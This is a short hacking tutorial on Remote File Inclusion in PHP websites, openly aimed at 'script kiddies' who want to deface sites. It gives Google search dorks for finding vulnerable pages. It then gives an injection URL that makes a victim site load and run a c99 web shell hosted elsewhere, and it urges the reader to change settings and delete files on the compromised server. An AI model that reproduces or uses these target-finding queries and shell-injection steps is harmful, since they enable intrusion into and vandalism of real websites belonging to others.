Remote File Inclusion Vulnerabilities Explained
Written by entr0py
Introduction
----------------
Remote File Inclusion alias RFI vulnerabilities subsists in most
of the websites that deploy dynamic web programming languages like
PHP, etc. It mainly occurs due to obtuse coding. In this tutorial,
I am going to explain how one can take benefit of such errors. Well,
again I must tell you that this tutorial is only for script kiddies,
who love to exploit vulnerabilities in order to deface (h4x0r) websites.
This is the sequel of ‘Hacking with Shells’ tutorial written by myself.
Anyways, let’s get on with the tutorial...
RFI’s
----------------
Remote File Inclusion vulnerabilities can be defined as injection of
malicious scripts (c99, r57 etc) by obfuscated URL strings. These
vulnerabilities exists in many web applications softwares like Bulletin
Board Systems, Content Management Systems etc. Actually, when we inject
the malicious script through well-molded URL string, our script replaces
the given page. After replacement of page, our script is executed and then
produced in the website.
Skiddie Zone
-----------------
Well, let me give you an example that shows the accurate way to hack a
Website using RFI vulnerabilities. Okay, so, first of all you need to
have a website that’s actually vulnerable to RFI exploits.
Where would I get a vulnerable website?
Just one place – Google. Just Google inurl:index.php?page= or inurl:index.php?pagedb=,
just try your imagination. Basically, these search syntaxes, exhibits sites that are
enforcing other pages to execute from a standard string.
Okay, I got
www.anysite.com, what should I next?
Now, you must inject a malicious (*evil script*) script that would give you full access
to the web server. Say, after Googling the above search syntax you got the following
URL:
www.anysite.com/index.php?page=somelink.php. To inject the web shell, you must
Replace somelink.php, with the website that contains the web shell. Say, you have
the web shell in
www.mysite.com/c99.txt, so to inject this web shell into a vulnerable
site, just execute the following URL:
www.anysite.com/index.php?page= www.mysite.com/c99.txtAfter injecting this URL, you would see that the C99 shell interface has popped in front
Of you. Just go alter the settings, delete file or do whatever you feel.